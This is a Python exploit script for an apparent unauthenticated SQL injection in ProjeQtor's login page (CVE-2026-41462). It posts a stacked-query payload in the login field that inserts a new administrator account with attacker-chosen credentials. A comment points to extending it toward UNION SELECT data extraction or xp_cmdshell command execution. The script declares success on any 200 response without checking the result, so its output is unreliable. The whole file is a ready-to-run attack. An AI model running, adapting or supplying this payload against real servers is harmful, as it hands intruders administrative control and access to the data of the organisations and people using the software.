#!/usr/bin/env python3
"""
CVE-2026-41462 - ProjeQtor Unauthenticated SQL Injection via Login
Tested on ProjeQtor 12.4.3
Author : Ashraf Zaryouh / @0xBlackash
Github : https://github.com/0xBlackash/CVE-2026-41462
"""

import requests
import sys
import argparse
import urllib3
from urllib.parse import urljoin

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def main():
    parser = argparse.ArgumentParser(description="CVE-2026-41462 - ProjeQtor SQLi Exploit")
    parser.add_argument("-u", "--url", required=True, help="Target URL (e.g. http://target.com)")
    parser.add_argument("--create-admin", action="store_true", help="Create a new admin user")
    parser.add_argument("--username", default="hacker", help="Username for new admin (default: hacker)")
    parser.add_argument("--password", default="Admin123!", help="Password for new admin (default: Admin123!)")
    parser.add_argument("-p", "--proxy", help="Proxy (e.g. http://127.0.0.1:8080)")
    args = parser.parse_args()

    target = args.url.rstrip("/")
    session = requests.Session()
    
    if args.proxy:
        session.proxies = {"http": args.proxy, "https": args.proxy}

    print(f"[+] Targeting: {target}")

    # Common login endpoint for ProjeQtor
    login_url = urljoin(target, "/login.php")   # or /projeqtor/login.php depending on installation

    # Payload to create a new admin user via stacked queries / INSERT
    # Adjust the table/column names if the exact schema differs slightly
    create_admin_payload = f"admin' ; INSERT INTO resource (name,login,password,profile) VALUES ('{args.username}','{args.username}',MD5('{args.password}'),1) -- "

    data = {
        "login": create_admin_payload,
        "password": "anything",
        "submit": "1"
    }

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    }

    try:
        print(f"[+] Sending payload to create admin user '{args.username}' ...")
        r = session.post(login_url, data=data, headers=headers, verify=False, timeout=15)

        if r.status_code == 200:
            print("[+] Request sent successfully.")
            print(f"[+] New admin created → Username: {args.username} | Password: {args.password}")
            print(f"[+] Try logging in at: {target}/login.php")
        else:
            print(f"[-] Unexpected status code: {r.status_code}")

        # Optional: You can extend this with data exfiltration payloads (UNION SELECT) or command execution if MSSQL + xp_cmdshell is enabled.

    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    main()